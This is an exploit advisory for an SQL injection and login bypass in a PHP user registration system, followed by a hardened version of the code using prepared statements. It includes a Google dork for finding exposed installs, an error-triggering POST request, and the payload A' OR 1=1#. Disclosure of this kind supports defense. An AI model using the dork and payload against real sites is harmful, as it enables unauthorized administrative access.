User Registration & Management System - SQLi [fixed typo]
2024-6-23 01:22:9 Author: cxsecurity.com

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System - SQLi
.:. Google Dorks .:. inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#############
|DESCRIPTION|
#############
"User Management System is a web based technology which manages user database and provides rights to update their details. In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."

===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass

Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]

POST PoC #1:
http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1

username='&password=test&login=

Response:
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9

===========================================================================================
Test #2 => Payload to skip authentication

http://localhost:9000/loginsystem/admin/index.php

username=A' OR 1=1#&password=1&login=

Response:
302 redirect to dashboard.php

===========================================================================================
Vuln File: /loginsystem/admin/index.php
Vul Code:

    <?php session_start();
    include_once('../includes/config.php');
    // Code for login
    if(isset($_POST['login']))
    {
        $adminusername=$_POST['username'];
        $pass=md5($_POST['password']);
        $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");
        $num=mysqli_fetch_array($ret);
        if($num>0)
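
A hardened form of the login check quoted above, as an added example that is not part of the advisory or the vendor's code. It assumes $con from includes/config.php is a mysqli connection and that admin.password holds the MD5 hex digest, as the quoted code implies; the session key name is hypothetical.

```php
<?php
// Added example (not vendor code): parameterized admin login.
ini_set('display_errors', '0');   // do not echo warnings or file paths to the client
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // DB errors become exceptions

session_start();
include_once('../includes/config.php'); // assumed to define $con (mysqli), as in the original

/**
 * Returns true only when the username exists and the password digest matches.
 * The username is sent as a bound parameter, so a quote or "#" in the input
 * is compared as data and never becomes part of the SQL text.
 */
function admin_login(mysqli $con, string $username, string $password): bool
{
    $stmt = $con->prepare('SELECT password FROM admin WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch();      // true when a row was fetched, null when none
    $stmt->close();

    if ($found !== true) {
        return false;
    }
    // Existing rows store md5(password); compare in constant time.
    return hash_equals((string) $storedHash, md5($password));
}

if (isset($_POST['login'])) {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';

    // Reject array-valued parameters (username[]=...) before they reach the query.
    if (is_string($username) && is_string($password)
        && admin_login($con, $username, $password)) {
        session_regenerate_id(true);        // new session id after authentication
        $_SESSION['adminid'] = $username;   // hypothetical session key
        header('Location: dashboard.php');
        exit;
    }

    http_response_code(401);
    echo 'Invalid username or password';
}
```

md5() is kept here only so existing rows still verify; moving the stored values to password_hash() and password_verify() is a separate change.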



 

Source: https://cxsecurity.com/issue/WLB-2024060053